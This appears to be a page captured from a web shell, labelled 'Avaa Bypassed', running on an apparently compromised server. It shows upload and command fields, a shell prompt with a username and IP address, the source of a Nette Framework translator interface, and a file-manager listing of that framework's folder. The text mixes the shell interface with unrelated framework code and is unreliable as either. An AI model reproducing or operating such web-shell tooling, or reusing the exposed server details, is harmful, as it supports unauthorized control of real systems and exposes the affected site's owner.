404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.135.220.169: ~ $
<?php

/**
 * This file is part of the Nette Framework (https://nette.org)
 * Copyright (c) 2004 David Grudl (https://davidgrudl.com)
 */

declare(strict_types=1);

namespace Nette\Localization;


/**
 * Translator adapter.
 */
interface Translator
{
	/**
	 * Translates the given string.
	 */
	function translate(string|\Stringable $message, mixed ...$parameters): string|\Stringable;
}


interface_exists(ITranslator::class);

Filemanager

Name Type Size Permission Actions
Iterators Folder 0755
Utils Folder 0755
HtmlStringable.php File 335 B 0644
SmartObject.php File 3.48 KB 0644
StaticClass.php File 633 B 0644
Translator.php File 428 B 0644
compatibility.php File 686 B 0644
exceptions.php File 2.2 KB 0644